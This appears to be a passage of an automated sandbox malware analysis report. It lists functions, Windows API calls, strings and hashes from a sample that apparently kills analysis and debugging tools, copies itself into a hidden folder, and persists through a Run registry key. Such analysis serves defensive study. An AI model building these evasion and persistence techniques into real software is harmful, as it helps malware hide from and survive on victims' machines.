                                                                                                                                                                                                                                                    Function 00007FF6626D2FE0 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D44C8: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D301B), ref: 00007FF6626D4510
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D44C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D301B), ref: 00007FF6626D454D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D44C8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D301B), ref: 00007FF6626D4558
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3A88: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D3020), ref: 00007FF6626D3ACB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3A88: RegSetValueExW.ADVAPI32 ref: 00007FF6626D3B01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3A88: RegCloseKey.ADVAPI32 ref: 00007FF6626D3B10
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3B28: RegDeleteKeyW.ADVAPI32 ref: 00007FF6626D3B40
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6626D3D3B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: Process32FirstW.KERNEL32 ref: 00007FF6626D3D6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: CloseHandle.KERNEL32 ref: 00007FF6626D3D80
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: wcscmp.MSVCRT ref: 00007FF6626D3D95
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: OpenProcess.KERNEL32 ref: 00007FF6626D3DAB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: TerminateProcess.KERNEL32 ref: 00007FF6626D3DCE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: CloseHandle.KERNEL32 ref: 00007FF6626D3DDC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: Process32NextW.KERNEL32 ref: 00007FF6626D3DEF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3D28: CloseHandle.KERNEL32 ref: 00007FF6626D3E01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D38B8: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6626D3A10), ref: 00007FF6626D38E8
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00007FF6626D30CA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                                    • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                                    • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                                    • Opcode ID: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction ID: cc68b32196607f1bd34dfce832cf9d1c44ba14767cec762acb2f9d41f0afa133
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A221AF24A1894FE3EF11AB20E9511F86330AF5071CFF04D31E41DCE2E69EACB556AB51
                                                                                                                                                                                                                                                    Function 00007FF6626D37C8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6626D3688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3648: GetVolumeInformationW.KERNEL32 ref: 00007FF6626D3705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3648: wsprintfW.USER32 ref: 00007FF6626D37A6
                                                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3811
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3826
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3839
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3849
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D385C
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3871
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3884
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3899
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: .exe
                                                                                                                                                                                                                                                    • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                                    • Opcode ID: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction ID: 41b65db32bbab690bc355ec7f1d88a464742999dc9f3cefb6ac896424cec85c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E114F256299CAC6EF608B25F850B6A6331FFC4788F905431DA4EC7E28DEBCD008D700
                                                                                                                                                                                                                                                    Function 00007FF6626D2E30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                                    • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 299056699-189039185
                                                                                                                                                                                                                                                    • Opcode ID: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction ID: de05bf90278feed2d6da53d8c65a0374929e17a29934d6d79fb7ba27ba228b52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B701E92290CA06C3EB319B21E8442696770FBC8B9CF650931D94ECE674CEBCD585A701
                                                                                                                                                                                                                                                    Function 00007FF6626D3D28 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                                                    • Opcode ID: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction ID: 20dbdbe33c03928717fc2feabb4babc8c0d529474d7549984a9a49dedb94977a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98212C31A0CA8AC3EB719B11E8483AA6370FBC4758F604634D59DCA5E8DF7DE454EB01
                                                                                                                                                                                                                                                    Function 00007FF6626D3BE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction ID: e0031972540a007e1be1bf6d4824df0d4ee6ef0e66a8fde92c5a84d016d81b80
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE31D67261CAC5C6DB709B19E4983AAA3B0F788B44F500625DA8DCBB68DF7CD194DB00
                                                                                                                                                                                                                                                    Function 00007FF6626D3978 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6626D3688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3648: GetVolumeInformationW.KERNEL32 ref: 00007FF6626D3705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D3648: wsprintfW.USER32 ref: 00007FF6626D37A6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3811
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3826
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3839
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3849
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D385C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3871
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3884
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6626D37C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6626D39AD), ref: 00007FF6626D3899
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32 ref: 00007FF6626D39BD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32 ref: 00007FF6626D39C8
                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00007FF6626D39E1
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32 ref: 00007FF6626D39F9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: Services
                                                                                                                                                                                                                                                    • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                                    • Opcode ID: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction ID: f6a26641f03f0201fa13b0dd8b962036488f468189ed4208d7d4eda5c4abdf54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68018821B1858AE3EF509B24E4513EA5370FB94748FE04832D24DCA5A4EE6CD21DDF00
                                                                                                                                                                                                                                                    Function 00007FF6626D3A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                                    • API String ID: 779948276-85274793
                                                                                                                                                                                                                                                    • Opcode ID: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction ID: a256eef40256c3ad21e4f6eba066e14c947da31d52acb0f0dfe9a9e9e91d133e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdfb63eb7f4e4077c4e669ef9c79ec623b7cf9fb08bf5e5be6b8c5055587e531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4501D376618A84CBDB509F15F84475AB7B4F788798FA01625EA8D83B68DFBDC144CF00
                                                                                                                                                                                                                                                    Function 00007FF6626D3F08 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2850635065-0
                                                                                                                                                                                                                                                    • Opcode ID: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction ID: e2fe8cf07019279b5e132549edbc0da21a64c19fda1b92e2c61ec4213ecf445f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC11EF71A0CA8AC7EB708F11E4483AA63B0FB84758F604635D69DCA698DF7CD514EF00
                                                                                                                                                                                                                                                    Function 00007FF6626D3648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                                    • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                                    • Opcode ID: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction ID: e1a72d22aa29e3c19d35e781211f1d9f793374341b3e01c630b38312f801169d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5331F52661C6C5C6DB309B64E4983AAB3B0FB85704F600526E28DC7A58EF7DC509DF44
                                                                                                                                                                                                                                                    Function 00007FF6626D38B8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenValue
                                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                                                    • API String ID: 779948276-1428018034
                                                                                                                                                                                                                                                    • Opcode ID: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction ID: ffbe9ff5c315acf5f1dc47d2eafd72cbfd9d7436f0b8ac3c091339d90d75d5ef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 669c29aa83851030d22a5aca8c4a0bbb02134fcc6607d6fff5ef8f40ef3caba8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC119332528784C6DB908B14F44066A77A0FB847A4F605631F9AE87BE8DFBCD084DB00
                                                                                                                                                                                                                                                    Function 00007FF6626D49BF Relevance: 6.3, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocCloseFreeHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2328737614-0
                                                                                                                                                                                                                                                    • Opcode ID: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction ID: f24ec0666355d0b10f5c096fdafffb2178da830c80014aa822ba51e90eb4ac2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05fe1dcc52a6b03368b4b6bceacff0eec43f08e90475ee6da0a9c80c1bd5b195
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1313D26609B84C2DF64CB59F49036AB3A0F7C9B95F114526EE8DC7BA8DE7CD4458B00
